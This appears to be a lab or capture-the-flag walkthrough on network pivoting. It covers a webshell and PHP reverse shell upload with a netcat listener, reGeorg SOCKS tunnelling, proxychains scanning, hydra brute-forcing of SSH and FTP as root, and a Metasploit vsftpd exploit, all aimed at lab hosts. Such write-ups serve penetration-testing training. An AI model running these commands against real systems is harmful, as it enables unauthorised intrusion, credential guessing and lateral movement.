Pivoting IX

Pivoting IX

Steps Taken:

1. Scanning the first target machine:

2. Enumerating directories on the webpage through the use of dirbuster:

	- Note that it is given to us where the link to login form in the first place: http://{ip}/?/admin

• Checking where the uploaded files land:

3. Upload a simple webshell:

4. Using the webshell to interact with the web server:

5. Taking advantage of the web shell to acquire a reverse shell so we upload a php-reverse-shell.php:

6. Using the uploaded reverse shell:

	- First, create a netcat listener with: nc -lvnp 8080

	- Second, execute it by going to: http://192.73.87.3/public/php-reverse-shell.php
	- Note that this php file is modified so that it will connect to this port 8080 listener on the client machine.

- You'd notice that the webpage is loading meaning, the file got executed and is on a process.

Netcat perspective:

7. Find the flag in this compromised machine:

find / -name *flag*

8. Get the flag:

cat /tmp/flag1.txt

9. Make this compromised machine a pivot to the internal network to reach internal network machines through the use of reGeorg:

	- Go to: ~/Desktop/tools/reGeorg/php/

10. In this directory, you can see the “tunnel.php” file. Upload this on the webpage. This is used to tunnel from the webserver to the internal network where the webserver is connected!

11. Now that you uploaded the php file, you can use the python code to create a SOCKS proxy server for the attacker machine to be able to reach the internal network machines:

python reGeorgeSocksProxy.py -p 9050 -u http://{ip}/public/tunnel.php

12. Now, NMAP with proxychains the internal machine:

proxychains nmap -sT -Pn {target-ip-internal}

	- This shows that there are 2 ports open: port 22(SSH) and port 21(FTP)
	- We know that we can both bruteforce them with Hydra so we do those in parallel.

13. Bruteforcing SSH and FTP

proxychains hydra 192.121.141.3 ssh -t 4 -l root -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-40.txt -f -V

proxychains hydra 192.121.141.3 ftp -t 4 -l root -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-40.txt -f -V

	- Note that you can do both on separate terminal to do them in parallel!

14. While doing so, you can also look for exploit for these services in Metasploit. The thing is, we connected to the web server via webshell and then upgraded to a bash reverse shell. Is there a way to do so in Metasploit?

	- Now ,we use the exploit/multi/handler which basically is like the "nc -lvnp 8080" command done. This just listens for connection coming from the compromised webserver.

	- Of course, I initialize the postgresql database first: ```bash # service postgresql start # msfdb init # msfconsole -q msf > db_status ```

- Note that it connected AFTER executing the php-reverse-shell.php AGAIN on the /public/php-reverse-shell.php on the webserver!

15. Reflection:

	- It seems that bruteforcing FTP and SSH services are taking so long, let's try to find exploit in Metasploit for FTP.

16. Using FTP exploit from metasploit:

		msf > search vsftpd

- Notice that I upgraded the reverse shell acquired as well!

- Here's the interface for the internal network where the web server is connected to.

17. Creating another pivot on the compromised machine to be able to send the exploit to the internal network machine with autoroute:

18. Check again if the SOCKS proxy server is there:

- It is there with port 9050 and is being run on python which is the reGeorgSocksProxy.py!
- At this point, I don't think the SOCKS proxy is necessary at this point since another pivot was created with Metasploit in the first place and usage of proxychains is unnecessary.

19. Trying the FTP exploit:

20. Exploiting the internal machine with the FTP exploit:

21. Finding the flag and taking it:

find / -name *flag*

cat /usr/bin/flag1.txt